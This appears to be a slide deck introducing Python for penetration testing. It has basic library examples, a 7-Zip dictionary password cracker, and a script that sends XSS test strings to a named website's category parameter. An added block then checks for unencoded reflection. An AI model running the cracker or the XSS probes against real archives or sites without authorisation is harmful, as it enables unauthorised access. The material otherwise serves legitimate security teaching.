PenTest using Python By Purna Chander
- 1. Purna Chander
Pen-Test Techniques using Python
- 2. Why?
Easy (install, learn, code)
Tons of Libraries
Code is easy to understand
Multiplatform
Good for Prototyping
Free
- 3. History
Conceived in the late 80s, with the first implementation in 1989
Created by Guido van Rossum
There are two branches: 2.x and 3.0
- 4. Python
Interpreted language
Object oriented
Indentation is significant in Python: it is the block delimiter.
Usual control structures (if, while, etc)
Multiple levels of organization (functions, classes, modules, packages)
- 5. Who is using Python?
Canvas
W3AF
Sqlmap
Impacket
Google
ImmunityDebugger
Peach
Sulley
Paimei
Scapy
Spike Proxy
Core Impact
- 6. Data Types
Data types:
Strings - "Hello"
Numbers - 123
Lists - ['hello', '2', '1']
Tuples - ('1', '2', '3') (immutable)
Dictionaries - d = {'key1': 'dog', 'key2': 'cat'}
- 7. Basic Code bits
ofile = "dictionary.txt"
# Read the wordlist and print each entry without its trailing newline
with open(ofile, 'r') as fil:
    for y in fil:
        print(y.rstrip('\n'))
- 8. Urllib3
Library to deal with HTTP
import urllib3
http = urllib3.PoolManager()
r = http.request('GET', 'https://python.org/')
print (r.status)
print (r.data)
- 9. 7 Zip Cracker
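import sys
from py7zlib import Archive7z  # py7zlib is part of the pylzma package

# Load the candidate passwords, dropping the newline readlines() would keep
with open('passwords.txt', 'r') as pas:
    passwords = [line.rstrip('\r\n') for line in pas]

for x in passwords:
    fp = open('test.7z', 'rb')
    try:
        archive = Archive7z(fp, password=x)
        print("The password is " + x)
        sys.exit()
    except Exception as e:
        # Wrong password (or unreadable archive): try the next candidate
        pass
    finally:
        fp.close()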
- 10. Win32Com
Library that allows us to access COM objects in Win32 systems
We can automate Word, Excel, PowerPoint, access WMI, etc.
- 11. Excel Processing
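from win32com.client import Dispatch

# Open the workbook in a visible Excel instance
xlApp = Dispatch("Excel.Application")
xlApp.Visible = 1
xlApp.Workbooks.Open("test.xls")
# Print column 5 (E) for rows 1 to 99 of the active sheet
for x in range(1, 100):
    nombre = str(xlApp.ActiveSheet.Cells(x, 5))
    print(nombre)
xlApp.Quit()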
- 12. WMI
import wmi

# List the ID and name of every running process via WMI
c = wmi.WMI()
for process in c.Win32_Process():
    print(process.ProcessId, process.Name)
- 14. SCRIPT
import http.client

xss_array = []  # test strings to send; the list is not shown on this page

for xss in xss_array:
    #print (xss)
    url = 'www.skywatcher.com'
    conn = http.client.HTTPConnection(url)
    print(url + '/downloads.php?cat=' + xss)
    conn.request('GET', '/downloads.php?cat=' + xss)
    resp = conn.getresponse()
    body = resp.read()
    # Print the status line with the HTTP version the server answered in
    if resp.version == 10:
        print('HTTP/1.0 %s %s' % (resp.status, resp.reason))
    if resp.version == 11:
        print('HTTP/1.1 %s %s' % (resp.status, resp.reason))
    for header in resp.getheaders():
        print('%s: %s' % (header[0], header[1]))
    #print ('\n', body)
    print("------------------------------------------------------------------------------")
    conn.close()
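
The script on slide 14 reads the response into `body` but prints only the status line and headers. The block below is an added example, not part of the original slides, showing the check that makes the result actionable for a developer: whether a harmless marker comes back in the body raw (output encoding missing) or encoded. `PROBE`, the function names and the sample bodies are constructed for illustration.

```python
import html
from urllib.parse import quote

# Constructed, harmless marker: markup characters but no script content.
PROBE = '<i id="probe-7f3a">'

def classify_reflection(probe, body):
    """Say how `probe` comes back in `body`: 'raw', 'encoded' or 'absent'."""
    if probe in body:
        # Markup characters survived unchanged: output encoding is missing.
        return "raw"
    encoded_forms = {
        html.escape(probe, quote=True),   # &lt;i id=&quot;...&quot;&gt;
        html.escape(probe, quote=False),  # &lt;i id="..."&gt;
        quote(probe, safe=""),            # %3Ci%20id%3D%22...%22%3E
    }
    if any(form in body for form in encoded_forms):
        return "encoded"
    return "absent"

def audit(responses, probe=PROBE):
    """Map each response name to its classification; list the raw ones."""
    results = {name: classify_reflection(probe, body)
               for name, body in responses.items()}
    findings = sorted(n for n, r in results.items() if r == "raw")
    return results, findings

# Constructed response bodies standing in for what resp.read() returned.
SAMPLE_RESPONSES = {
    "unencoded": '<p>Category: <i id="probe-7f3a"></p>',
    "html_escaped": '<p>Category: &lt;i id=&quot;probe-7f3a&quot;&gt;</p>',
    "url_in_link": '<a href="?cat=%3Ci%20id%3D%22probe-7f3a%22%3E">next</a>',
    "mixed": '<title>&lt;i id="probe-7f3a"&gt;</title><i id="probe-7f3a">',
    "not_reflected": "<p>No such category</p>",
}

if __name__ == "__main__":
    results, findings = audit(SAMPLE_RESPONSES)
    for name, verdict in results.items():
        print(f"{name:14} {verdict}")
    print("needs output encoding:", findings)
```

`resp.read()` returns bytes, so decode the body (for example `body.decode('utf-8', 'replace')`) before passing it to `classify_reflection`.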